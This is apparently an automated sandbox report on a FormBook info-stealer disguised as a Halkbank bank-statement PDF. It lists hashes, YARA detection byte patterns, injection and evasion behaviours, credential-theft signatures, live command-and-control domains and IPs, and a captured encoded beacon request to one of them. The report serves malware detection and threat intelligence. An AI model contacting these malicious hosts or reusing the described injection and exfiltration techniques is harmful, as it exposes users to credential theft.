Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Halkbank_Ekstre_20191102_073809_405251-PDF.com.exe

Overview

General Information

Sample Name:Halkbank_Ekstre_20191102_073809_405251-PDF.com.exe
Analysis ID:814000
MD5:9ad124bf22839603024a373ba636532b
SHA1:50f0b83d0deb5b40e8b306e4122ae3c1173eda1e
SHA256:c448049c359c9ada55dbdefbb772020aa3962804d485ccf52adefb3a2030e3fb
Tags:comexeFormbookgeoHalkbankTUR
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Sample uses process hollowing technique
Tries to steal Mail credentials (via file / registry access)
Maps a DLL or memory area into another process
Machine Learning detection for sample
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Queues an APC in another process (thread injection)
Machine Learning detection for dropped file
Modifies the context of a thread in another process (thread injection)
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Contains functionality to check if a debugger is running (IsDebuggerPresent)
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops PE files
Contains functionality to read the PEB
Checks if the current process is being debugged
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard

Classification

Process Tree

  • System is w10x64
  • Halkbank_Ekstre_20191102_073809_405251-PDF.com.exe (PID: 4692 cmdline: C:\Users\user\Desktop\Halkbank_Ekstre_20191102_073809_405251-PDF.com.exe MD5: 9AD124BF22839603024A373BA636532B)
    • dlcmto.exe (PID: 1012 cmdline: "C:\Users\user\AppData\Local\Temp\dlcmto.exe" C:\Users\user\AppData\Local\Temp\osqafruepl.xf MD5: 00463A9A4FBFEE77A95181CC2C45A9B4)
      • conhost.exe (PID: 3268 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • dlcmto.exe (PID: 3600 cmdline: C:\Users\user\AppData\Local\Temp\dlcmto.exe MD5: 00463A9A4FBFEE77A95181CC2C45A9B4)
        • explorer.exe (PID: 3452 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
          • autoconv.exe (PID: 5384 cmdline: C:\Windows\SysWOW64\autoconv.exe MD5: 4506BE56787EDCD771A351C10B5AE3B7)
          • explorer.exe (PID: 4648 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 166AB1B9462E5C1D6D18EC5EC0B6A5F7)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000003.00000002.297238970.0000000000400000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000003.00000002.297238970.0000000000400000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x20e83:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0xcc02:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    • 0x1a0ba:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
    00000003.00000002.297238970.0000000000400000.00000040.80000000.00040000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x19eb8:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x19954:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x19fba:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1a132:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xc7cd:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x18b9f:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0x1fc2a:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x20bdd:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000003.00000002.297682899.0000000000F40000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000003.00000002.297682899.0000000000F40000.00000040.10000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x1f0d0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0xae4f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      • 0x18307:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
      Click to see the 13 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      3.2.dlcmto.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        3.2.dlcmto.exe.400000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
        • 0x20e83:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
        • 0xcc02:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
        • 0x1a0ba:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
        3.2.dlcmto.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x19eb8:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x19954:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x19fba:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x1a132:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0xc7cd:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x18b9f:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x1fc2a:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x20bdd:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        3.2.dlcmto.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          3.2.dlcmto.exe.400000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x20083:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0xbe02:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          • 0x192ba:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
          Click to see the 1 entries

          Sigma Signatures

          No Sigma rule has matched

          Snort Signatures

          Timestamp:192.168.2.38.8.8.858921532023883 02/23/23-10:24:31.760663
          SID:2023883
          Source Port:58921
          Destination Port:53
          Protocol:UDP
          Classtype:Potentially Bad Traffic

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Multi AV Scanner detection for submitted file
          Source: Halkbank_Ekstre_20191102_073809_405251-PDF.com.exeReversingLabs: Detection: 30%
          Yara detected FormBook
          Source: Yara matchFile source: 3.2.dlcmto.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.dlcmto.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000003.00000002.297238970.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.297682899.0000000000F40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.517154599.0000000004450000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.297724728.0000000000FA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.515846426.00000000025B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.517245778.0000000004480000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Antivirus detection for URL or domain
          Source: http://www.7dkjhk.com/ghii/Avira URL Cloud: Label: malware
          Source: http://www.hubyazilim.com/ghii/Avira URL Cloud: Label: malware
          Source: http://www.genuineinsights.cloud/ghii/Avira URL Cloud: Label: malware
          Source: http://www.ladybillplanet.com/ghii/Avira URL Cloud: Label: malware
          Source: http://www.energybig.xyzAvira URL Cloud: Label: malware
          Source: http://www.octohoki.net/ghii/Avira URL Cloud: Label: malware
          Source: http://www.octohoki.netAvira URL Cloud: Label: malware
          Source: http://www.genuineinsights.cloudAvira URL Cloud: Label: phishing
          Source: http://www.wenzid4.top/ghii/Avira URL Cloud: Label: malware
          Source: http://www.wenzid4.top/ghii/?XdZ7vzmO=MOY5/0rZkCSn1x8B5kGxcu4kjN12BC26NMBU4rUAiJ09dU/WDm+Fx0Du9tK3DtQGeLOXEwxSHBLi0tUrRAF6AjHy/cvLKIMIEQ==&IM4=qwV6CUVoIAuPXvAvira URL Cloud: Label: malware
          Source: http://www.energybig.xyz/ghii/Avira URL Cloud: Label: malware
          Multi AV Scanner detection for dropped file
          Source: C:\Users\user\AppData\Local\Temp\dlcmto.exeReversingLabs: Detection: 23%
          Machine Learning detection for sample
          Source: Halkbank_Ekstre_20191102_073809_405251-PDF.com.exeJoe Sandbox ML: detected
          Machine Learning detection for dropped file
          Source: C:\Users\user\AppData\Local\Temp\dlcmto.exeJoe Sandbox ML: detected
          Source: 1.2.dlcmto.exe.d50000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 3.2.dlcmto.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: Halkbank_Ekstre_20191102_073809_405251-PDF.com.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
          Source: Halkbank_Ekstre_20191102_073809_405251-PDF.com.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: Binary string: explorer.pdbUGP source: dlcmto.exe, 00000003.00000002.298566027.0000000002C80000.00000040.10000000.00040000.00000000.sdmp, dlcmto.exe, 00000003.00000003.295506856.0000000003001000.00000004.00000020.00020000.00000000.sdmp, dlcmto.exe, 00000003.00000003.294435514.0000000002C80000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\xampp\htdocs\033f3715fd5f4d1cb9aa179eaa7531bc\Loader\Release\Loader.pdb source: Halkbank_Ekstre_20191102_073809_405251-PDF.com.exe, 00000000.00000002.259315149.0000000002877000.00000004.00000020.00020000.00000000.sdmp, Halkbank_Ekstre_20191102_073809_405251-PDF.com.exe, 00000000.00000002.259072728.000000000040C000.00000004.00000001.01000000.00000003.sdmp, dlcmto.exe, 00000001.00000002.255689187.00000000011A0000.00000002.00000001.01000000.00000004.sdmp, dlcmto.exe, 00000001.00000000.248339390.00000000011A0000.00000002.00000001.01000000.00000004.sdmp, dlcmto.exe, 00000003.00000002.297879282.00000000011A0000.00000002.00000001.01000000.00000004.sdmp, explorer.exe, 00000009.00000002.518882230.0000000004B23000.00000004.10000000.00040000.00000000.sdmp, nsh9334.tmp.0.dr, dlcmto.exe.0.dr
          Source: Binary string: wntdll.pdbUGP source: dlcmto.exe, 00000001.00000003.252021778.000000001A7D0000.00000004.00001000.00020000.00000000.sdmp, dlcmto.exe, 00000001.00000003.252292362.000000001A960000.00000004.00001000.00020000.00000000.sdmp, dlcmto.exe, 00000003.00000002.297907577.00000000012CF000.00000040.00001000.00020000.00000000.sdmp, dlcmto.exe, 00000003.00000003.255304096.0000000000FA5000.00000004.00000020.00020000.00000000.sdmp, dlcmto.exe, 00000003.00000003.253006768.0000000000E03000.00000004.00000020.00020000.00000000.sdmp, dlcmto.exe, 00000003.00000002.297907577.00000000011B0000.00000040.00001000.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.299557903.0000000004644000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.297581273.0000000004456000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.517484627.00000000048FF000.00000040.00001000.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.517484627.00000000047E0000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: dlcmto.exe, 00000001.00000003.252021778.000000001A7D0000.00000004.00001000.00020000.00000000.sdmp, dlcmto.exe, 00000001.00000003.252292362.000000001A960000.00000004.00001000.00020000.00000000.sdmp, dlcmto.exe, 00000003.00000002.297907577.00000000012CF000.00000040.00001000.00020000.00000000.sdmp, dlcmto.exe, 00000003.00000003.255304096.0000000000FA5000.00000004.00000020.00020000.00000000.sdmp, dlcmto.exe, 00000003.00000003.253006768.0000000000E03000.00000004.00000020.00020000.00000000.sdmp, dlcmto.exe, 00000003.00000002.297907577.00000000011B0000.00000040.00001000.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.299557903.0000000004644000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.297581273.0000000004456000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.517484627.00000000048FF000.00000040.00001000.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.517484627.00000000047E0000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: explorer.pdb source: dlcmto.exe, 00000003.00000002.298566027.0000000002C80000.00000040.10000000.00040000.00000000.sdmp, dlcmto.exe, 00000003.00000003.295506856.0000000003001000.00000004.00000020.00020000.00000000.sdmp, dlcmto.exe, 00000003.00000003.294435514.0000000002C80000.00000004.00000020.00020000.00000000.sdmp
          Source: C:\Users\user\Desktop\Halkbank_Ekstre_20191102_073809_405251-PDF.com.exeCode function: 0_2_00405D74 CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405D74
          Source: C:\Users\user\Desktop\Halkbank_Ekstre_20191102_073809_405251-PDF.com.exeCode function: 0_2_0040699E FindFirstFileW,FindClose,0_2_0040699E
          Source: C:\Users\user\Desktop\Halkbank_Ekstre_20191102_073809_405251-PDF.com.exeCode function: 0_2_0040290B FindFirstFileW,0_2_0040290B
          Source: C:\Users\user\AppData\Local\Temp\dlcmto.exeCode function: 1_2_01197D84 FindFirstFileExW,_free,FindNextFileW,_free,FindClose,_free,1_2_01197D84
          Source: C:\Users\user\AppData\Local\Temp\dlcmto.exeCode function: 1_2_01197CD3 _free,_free,FindFirstFileExW,_free,1_2_01197CD3
          Source: C:\Users\user\AppData\Local\Temp\dlcmto.exeCode function: 3_2_01197D84 FindFirstFileExW,_free,FindNextFileW,_free,FindClose,_free,3_2_01197D84
          Source: C:\Users\user\AppData\Local\Temp\dlcmto.exeCode function: 3_2_01197CD3 _free,_free,FindFirstFileExW,_free,3_2_01197CD3

          Networking

          barindex
          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exeNetwork Connect: 107.148.8.96 80Jump to behavior
          Source: C:\Windows\SysWOW64\explorer.exeNetwork Connect: 194.102.227.30 80Jump to behavior
          Source: C:\Windows\SysWOW64\explorer.exeDomain query: www.cutgang.net
          Source: C:\Windows\explorer.exeDomain query: www.wenzid4.top
          Snort IDS alert for network traffic
          Source: TrafficSnort IDS: 2023883 ET DNS Query to a *.top domain - Likely Hostile 192.168.2.3:58921 -> 8.8.8.8:53
          Source: Joe Sandbox ViewASN Name: PEGTECHINCUS PEGTECHINCUS
          Source: Joe Sandbox ViewASN Name: VODAFONE_ROCharlesdeGaullenr15RO VODAFONE_ROCharlesdeGaullenr15RO
          Source: global trafficHTTP traffic detected: GET /ghii/?XdZ7vzmO=MOY5/0rZkCSn1x8B5kGxcu4kjN12BC26NMBU4rUAiJ09dU/WDm+Fx0Du9tK3DtQGeLOXEwxSHBLi0tUrRAF6AjHy/cvLKIMIEQ==&IM4=qwV6CUVoIAuPXv HTTP/1.1Host: www.wenzid4.topConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 107.148.8.96 107.148.8.96
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 23 Feb 2023 09:22:37 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
          Source: Halkbank_Ekstre_20191102_073809_405251-PDF.com.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
          Source: explorer.exe, 00000004.00000003.473047459.000000000F52A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.526996565.000000000F52A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.7dkjhk.com
          Source: explorer.exe, 00000004.00000002.526996565.000000000F52A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.7dkjhk.com/ghii/
          Source: explorer.exe, 00000004.00000003.473047459.000000000F52A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.526996565.000000000F52A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.assilajamiart.com
          Source: explorer.exe, 00000004.00000002.526996565.000000000F52A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.assilajamiart.com/ghii/
          Source: explorer.exe, 00000004.00000003.273579499.000000000F276000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.526428626.000000000F270000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.268677971.000000000F276000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
          Source: explorer.exe, 00000004.00000003.473047459.000000000F52A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.526996565.000000000F52A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.bemmulher.online
          Source: explorer.exe, 00000004.00000002.526996565.000000000F52A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.bemmulher.online/ghii/
          Source: explorer.exe, 00000004.00000003.473047459.000000000F52A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.526996565.000000000F52A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.cutgang.net
          Source: explorer.exe, 00000009.00000002.519305983.000000000737D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.cutgang.net/Bj
          Source: explorer.exe, 00000004.00000002.526996565.000000000F52A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.cutgang.net/ghii/
          Source: explorer.exe, 00000009.00000002.519305983.000000000737D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.cutgang.net/ghii/?XdZ7vzmO=ZjEpLe7oxQ70uLnf6hiyuc6pu0EMckSA0PTIEH8mULBl4PD4NIfksCJCZa9jgf
          Source: explorer.exe, 00000004.00000003.473047459.000000000F52A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.526996565.000000000F52A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.de-nagel.com
          Source: explorer.exe, 00000004.00000002.526996565.000000000F52A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.de-nagel.com/ghii/
          Source: explorer.exe, 00000004.00000003.473047459.000000000F52A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.526996565.000000000F52A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.energybig.xyz
          Source: explorer.exe, 00000004.00000002.526996565.000000000F52A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.energybig.xyz/ghii/
          Source: explorer.exe, 00000004.00000003.473047459.000000000F52A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.526996565.000000000F52A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.fluxgreenn.space
          Source: explorer.exe, 00000004.00000002.526996565.000000000F52A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.fluxgreenn.space/ghii/
          Source: explorer.exe, 00000004.00000003.473047459.000000000F52A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.526996565.000000000F52A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.genuineinsights.cloud
          Source: explorer.exe, 00000004.00000002.526996565.000000000F52A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.genuineinsights.cloud/ghii/
          Source: explorer.exe, 00000004.00000003.473047459.000000000F52A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.526996565.000000000F52A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.hubyazilim.com
          Source: explorer.exe, 00000004.00000002.526996565.000000000F52A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.hubyazilim.com/ghii/
          Source: explorer.exe, 00000004.00000003.473047459.000000000F52A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.526996565.000000000F52A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ixirwholesale.xyz
          Source: explorer.exe, 00000004.00000002.526996565.000000000F52A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ixirwholesale.xyz/ghii/
          Source: explorer.exe, 00000004.00000003.473047459.000000000F52A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.526996565.000000000F52A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ladybillplanet.com
          Source: explorer.exe, 00000004.00000002.526996565.000000000F52A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ladybillplanet.com/ghii/
          Source: explorer.exe, 00000004.00000003.473047459.000000000F52A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.526996565.000000000F52A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.nortonseecurity.com
          Source: explorer.exe, 00000004.00000002.526996565.000000000F52A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.nortonseecurity.com/ghii/
          Source: explorer.exe, 00000004.00000003.473047459.000000000F52A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.526996565.000000000F52A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.octohoki.net
          Source: explorer.exe, 00000004.00000002.526996565.000000000F52A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.octohoki.net/ghii/
          Source: explorer.exe, 00000004.00000003.473047459.000000000F52A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.526996565.000000000F52A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.sem-jobs.com
          Source: explorer.exe, 00000004.00000002.526996565.000000000F52A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.sem-jobs.com/ghii/
          Source: explorer.exe, 00000004.00000003.473047459.000000000F52A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.526996565.000000000F52A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.wenzid4.top
          Source: explorer.exe, 00000004.00000002.526996565.000000000F52A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.wenzid4.top/ghii/
          Source: explorer.exe, 00000004.00000003.473047459.000000000F52A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.526996565.000000000F52A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.yeah-go.com
          Source: explorer.exe, 00000004.00000002.526996565.000000000F52A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.yeah-go.com/ghii/
          Source: -912K03JO.9.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
          Source: -912K03JO.9.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
          Source: -912K03JO.9.drString found in binary or memory: https://duckduckgo.com/ac/?q=
          Source: explorer.exe, 00000009.00000003.353036746.0000000007371000.00000004.00000020.00020000.00000000.sdmp, -912K03JO.9.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
          Source: -912K03JO.9.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
          Source: explorer.exe, 00000009.00000003.353036746.0000000007371000.00000004.00000020.00020000.00000000.sdmp, -912K03JO.9.drString found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
          Source: explorer.exe, 00000009.00000003.353036746.0000000007371000.00000004.00000020.00020000.00000000.sdmp, -912K03JO.9.drString found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=
          Source: explorer.exe, 00000009.00000003.353036746.0000000007371000.00000004.00000020.00020000.00000000.sdmp, -912K03JO.9.drString found in binary or memory: https://search.yahoo.com?fr=crmas_sfp
          Source: explorer.exe, 00000009.00000003.353036746.0000000007371000.00000004.00000020.00020000.00000000.sdmp, -912K03JO.9.drString found in binary or memory: https://search.yahoo.com?fr=crmas_sfpf
          Source: explorer.exe, 00000009.00000003.353036746.0000000007371000.00000004.00000020.00020000.00000000.sdmp, -912K03JO.9.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
          Source: unknownDNS traffic detected: queries for: www.wenzid4.top
          Source: global trafficHTTP traffic detected: GET /ghii/?XdZ7vzmO=MOY5/0rZkCSn1x8B5kGxcu4kjN12BC26NMBU4rUAiJ09dU/WDm+Fx0Du9tK3DtQGeLOXEwxSHBLi0tUrRAF6AjHy/cvLKIMIEQ==&IM4=qwV6CUVoIAuPXv HTTP/1.1Host: www.wenzid4.topConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: C:\Users\user\Desktop\Halkbank_Ekstre_20191102_073809_405251-PDF.com.exeCode function: 0_2_00405809 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00405809

          E-Banking Fraud

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 3.2.dlcmto.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.dlcmto.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000003.00000002.297238970.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.297682899.0000000000F40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.517154599.0000000004450000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.297724728.0000000000FA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.515846426.00000000025B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.517245778.0000000004480000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

          System Summary

          barindex
          Malicious sample detected (through community Yara rule)
